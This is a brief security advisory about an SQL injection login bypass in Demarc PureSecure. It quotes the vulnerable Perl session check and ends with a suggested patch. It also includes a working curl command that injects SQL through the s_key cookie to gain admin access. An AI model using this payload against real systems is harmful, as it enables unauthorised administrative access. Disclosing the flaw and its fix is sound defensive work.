COMMAND
	Demarc PureSecure login bypass
SYSTEMS AFFECTED
	all versions ?
PROBLEM
	pokleyzz sakamaniaka says :
	Demarc PureSecure (http://www.demarc.org) is  an  all-inclusive  network
	monitoring solution that allows you to  monitor  an  entire  network  of
	servers from one powerful web interface.
	user can bypass login and get admin  status  by  sql  injection  through
	cookies s_key
	
	--------- line 319 ------------------------------
	elsif (($cookies{'s_key'}) && ($cookies{'s_key'}-
	>value)){
		$logged_in_as = &check_login($cookies
	{'s_key'}->value);
		if (!$logged_in_as){
			   &print_login_screen;
	   		&safe_exit;
		}
	-----------------------------------------------------
	
	s_key  = will be use for sql in fuction check_login query ( line 6114)
	
	---------lini 6114---------------------------------
	$sql_query = "	SELECT \
		f1,f2,f3,admin,username,UNIX_TIMESTAMP
	(current_login_timedate) AS LOGINTIME \
		FROM \
		dm_sessions \
		WHERE current_session_id = '$session_id' ";
	-----------------------------------------------------
	
	 Exploit 
	 =======
	using curl :
	
	curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc
	
SOLUTION
	Patch as follow :
	
	line 6113: &safe_slash(\$session_id' );